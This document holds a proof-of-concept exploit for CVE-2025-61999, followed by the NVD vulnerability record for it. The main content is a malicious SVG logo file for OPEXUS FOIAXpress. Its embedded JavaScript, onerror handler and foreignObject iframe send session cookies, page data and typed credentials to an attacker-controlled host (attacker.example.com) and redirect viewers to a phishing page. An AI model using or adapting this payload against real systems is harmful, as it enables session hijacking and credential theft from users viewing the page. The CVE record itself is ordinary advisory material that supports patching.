CVE-2025-61999

<!-- CVE-2025-61999 PoC: Malicious SVG file with embedded JavaScript --> <!-- This SVG file, when uploaded as a logo in OPEXUS FOIAXpress, will execute JavaScript in the context of any user viewing the affected page --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200" viewBox="0 0 200 200"> <rect x="0" y="0" width="200" height="200" fill="#ffffff"/> <text x="100" y="100" text-anchor="middle" fill="#000000">Company Logo</text> <!-- Method 1: Inline script execution via onload event --> <script type="text/javascript"> // Exfiltrate session cookies to attacker-controlled server var attackerServer = "https://attacker.example.com/steal"; var stolenData = { cookies: document.cookie, url: window.location.href, referrer: document.referrer, userAgent: navigator.userAgent, timestamp: new Date().toISOString() }; // Send stolen data to attacker's server var img = new Image(); img.src = attackerServer + "?data=" + encodeURIComponent(JSON.stringify(stolenData)); // Create a fake login form to steal credentials var fakeForm = document.createElement('form'); fakeForm.method = 'POST'; fakeForm.action = attackerServer + '/credentials'; fakeForm.innerHTML = '<input name="username"><input name="password">'; document.body.appendChild(fakeForm); </script> <!-- Method 2: Event handler based XSS --> <image xlink:href="x" onerror="fetch('https://attacker.example.com/log?cookie=' + document.cookie)"/> <!-- Method 3: Using foreignObject to embed HTML/JS --> <foreignObject x="0" y="0" width="200" height="200"> <body xmlns="http://www.w3.org/1999/xhtml"> <iframe src="javascript:parent.location='https://attacker.example.com/phishing?cookie='+document.cookie" width="0" height="0"/> </body> </foreignObject> </svg>

{"cve": {"id": "CVE-2025-61999", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-08T00:15:34.373", "lastModified": "2025-10-22T14:45:32.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to upload JavaScript or other content embedded in an SVG image used as a logo. Injected content is executed in the context of other users when they view affected pages. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.13.3.0", "matchCriteriaId": "7077A02D-D6F5-4E4E-B6A4-E2D8AFBF8EAC"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-61999", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}